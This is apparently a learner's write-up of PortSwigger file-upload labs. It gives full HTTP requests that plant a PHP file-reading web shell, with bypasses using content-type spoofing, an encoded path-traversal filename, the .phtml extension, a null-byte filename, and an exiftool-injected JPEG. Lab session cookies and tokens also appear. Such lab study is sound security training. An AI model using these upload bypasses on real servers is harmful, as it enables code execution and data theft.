- Published on
File Upload Labs Overview
File Upload
Current Lab
https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-race-condition
Stuck on this one. Maybe will have to send request bulk ( via a script or intruder ) to exploit race condition.
Completed Labs
Request is :
POST /my-account/avatar HTTP/1.1
Host: ac001ff71f84373ec0250aad009900f6.web-security-academy.net
Cookie: session=oNfNC6EV6EeWRhPFR20s8YFSNB1vhCIY
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac001ff71f84373ec0250aad009900f6.web-security-academy.net/my-account
Content-Type: multipart/form-data; boundary=---------------------------54678472011940128371129110003
Content-Length: 580
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
-----------------------------54678472011940128371129110003
Content-Disposition: form-data; name="avatar"; filename="index.php"
Content-Type: text/plain
<?php
$path = "/home/carlos/secret";
$fileContent = file_get_contents($path);
echo $fileContent;
?>
-----------------------------54678472011940128371129110003
Content-Disposition: form-data; name="user"
wiener
-----------------------------54678472011940128371129110003
Content-Disposition: form-data; name="csrf"
CyWcDOIewMR1vVCz9Z5SyAIUvX635o7I
-----------------------------54678472011940128371129110003--

Request is same as before
Here we don't change content type and we just upload a file with php extension
Response
- Lab https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-path-traversal
Request is :
POST /my-account/avatar HTTP/1.1
Host: ac741f831fb332fcc08fcbde003e00fb.web-security-academy.net
Cookie: session=0foxB7Zs6s6U7kHmBeP4q6Je9t7CNn4R
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac741f831fb332fcc08fcbde003e00fb.web-security-academy.net/my-account
Content-Type: multipart/form-data; boundary=---------------------------16141849379546297572049735286
Content-Length: 582
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
-----------------------------16141849379546297572049735286
Content-Disposition: form-data; name="avatar"; filename="..%2f62.php"
Content-Type: image/jpeg
<?php
$path = "/home/carlos/secret";
$fileContent = file_get_contents($path);
echo $fileContent;
?>
-----------------------------16141849379546297572049735286
Content-Disposition: form-data; name="user"
wiener
-----------------------------16141849379546297572049735286
Content-Disposition: form-data; name="csrf"
o9jIgJxyGwddrZnTAle7fiiafGj20cEu
-----------------------------16141849379546297572049735286--
Response is :
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 04:55:05 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 132
The file avatars/../62.php has been uploaded.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>
File content is
file extension php is blacklisted so i used phtml from this site
the most important part of request is below
Content-Disposition: form-data; name="avatar"; filename="p.phtml"
Content-Type: image/jpeg
<?php
$path = "/home/carlos/secret";
$fileContent = file_get_contents($path);
echo $fileContent;
?>
the file gets uploaded easily
and the result is
The backend only takes png or jpg extension files hence we can't upload files ending with php extension. Hence we used null byte to ignore jpg extension the filename is p.php%00.jpg
Request is
Content-Disposition: form-data; name="avatar"; filename="p.php%00.jpg"
Content-Type: image/jpeg
<?php
$path = "/home/carlos/secret";
$fileContent = file_get_contents($path);
echo $fileContent;
?>
So here the backend reads the incoming file and tell whether its a valid jepg or png.
- We used exiftool to add php code in jpeg file
./exiftool -Comment='<?php $path = "/home/carlos/secret"; $fileContent = file_get_contents($path); echo $fileContent; echo "hey wassup" ?>' ../test.jpg
- Then we uploaded the file as test.php
- Now when you go to files/avatars/test.php then we see the following response
Here it hard to find our required output. I did put "hey wassup" so that I can search it but the browser is not searching. Eventually I was able to find it.
The secret key is M2eMeYXz2bsSAEfwRNsLim3vILBtloiY and not wM.... I had to put it multiple times till I got the correct one. Maybe add a known string like hey wassup before and after the required value.